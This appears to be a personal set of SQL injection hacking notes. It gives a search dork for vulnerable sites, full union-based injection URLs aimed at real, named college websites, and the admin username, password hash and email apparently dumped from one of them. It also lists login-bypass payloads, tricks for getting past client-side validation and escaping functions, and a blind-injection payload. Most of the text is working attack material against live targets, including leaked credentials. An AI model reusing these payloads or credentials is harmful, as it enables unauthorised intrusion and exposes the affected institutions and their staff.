DORK - inurl:.php?id= site:.pk




What is SQL Injection ?

SQL injection is a code injection technique that might destroy your database.
SQL injection is one of the most common web hacking techniques.


Types of SQL injection

1.Error Based - ' 
2.Union Based - '
3.Blind Based - ' AND 1=1,OR 1=1


user - user() [cptctvpm_poly_user@localhost]
database version - version() [10.6.13-MariaDB]

To check SQLi - [',"]

To Balance url - [--+,--+-]

To find Columns - [ORDER+BY+1] - we got 16 columns " https://hcst.edu.in/fullprofile.php?id=75%27ORDER+BY+16--%20-"

To find Vulnerable columns - [UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16]  " https://hcst.edu.in/fullprofile.php?id=75%27UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20-"

To find hidden Vulnerable columns - [AND+0+]   

To find hidden Vulnerable columns - [UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16]  " https://hcst.edu.in/fullprofile.php?id=75%27AND+0+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20-"

user() - [HCSTEDU_QUIZ@LOCALHOST]
database() - [MySQL 5.7.42 (2023-04-18)]
 

To find all databases - (SELECT+GROUP_CONCAT(schema_name)+FROM+INFORMATION_SCHEMA.SCHEMATA) - [information_schema,cptctvpm_polytech_new]

To find all databases - (SELECT+GROUP_CONCAT(schema_name)+FROM+INFORMATION_SCHEMA.SCHEMATA) - [INFORMATION_SCHEMA,HCSTEDU_QUIZ]

To find tables name - (SELECT+GROUP_CONCAT(table_name)+FROM+INFORMATION_SCHEMA.TABLES)

To find tables name from website database - 
(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE())      ----- > agar multiple database rahe too isko hex me convert kr ke database ka nam likhte hai
table name - [cpt_admin]




https://hcst.edu.in/fullprofile.php?id=75%27UNION+SELECT+1,2,3,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),5,@@GLOBAL.VERSION,7,8,9,10,11,12,13,14,15,16--%20-



To find columns name - (SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x6370745f61646d696e+AND+TABLE_SCHEMA=DATABASE())



https://hcst.edu.in/fullprofile.php?id=75%27UNION+SELECT+1,2,3,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x4c4f47494e+AND+TABLE_SCHEMA=DATABASE()),5,@@GLOBAL.VERSION,7,8,9,10,11,12,13,14,15,16--%20-




(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x4c4f47494e20+AND+TABLE_SCHEMA=DATABASE())

column name - [username,password,email_id]


To dump data - (SELECT+GROUP_CONCAT(username,password,email_id+SEPARATOR+0x3c62723e)+FROM+cpt_admin)

To dump data from other database - (SELECT+GROUP_CONCAT(username,password,email_id+SEPARATOR+0x3c62723e)+FROM+[database_name].cpt_admin)

username - super@Cptcadmin
password - cddbc321b8dfbd0a4145695631925d69
email - superadmin@cptc.ac.in



sql injection can be performed on a login page as well 

ex :- SELECT * from users where username = 'admin' and password = 'admin123' Code will be like this --> SELECT * from users where username = 'admin' and password = 'admin123' or 1=1--'
 or it can be like this --> SELECT * from users where username = 'admin' and password = 'admin123' or '1'='1'--'
 or it can be like this --> SELECT * from users where username = 'admin' and password = 'admin123' or '1'='1'#
 or it can be like this --> SELECT * from users where username = 'admin' and password = 'admin123' or '1'='1'/*
 or it can be like this --> SELECT * from users where username = 'admin' # ' and password = 'admin123' or 1=1 --'
 or it can be like this --> SELECT * from users where username = 'admin' order by 1--'





 if client side validation is on then we can bypass it by using burp suite or by using inspect element and changing the type of input 
 from password to text and then we can see the password in plain text


diffrent levels of sql injection
<?php
    $query = "SELECT * FROM users WHERE username = '" . 
    ['username'] . 
    "' AND password = '" . 
    ['password'] . "'";


    $query = "SELECT * FROM users WHERE username = '" . 
    $conn->real_escape_string($_POST['username']) .
    "' AND password = '" .
    $conn->real_escape_string($_POST['password']) . "'";

?>

ways to byass real_escape_string function
      1. hex encoding
      2. double encoding


Retrieving multiple values within a single column
' UNION SELECT NULL,username || '~' || password FROM users--


Blind SQL Injection
1. Conditional Responses using substring

'union SELECT substring((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1)>a FROM users --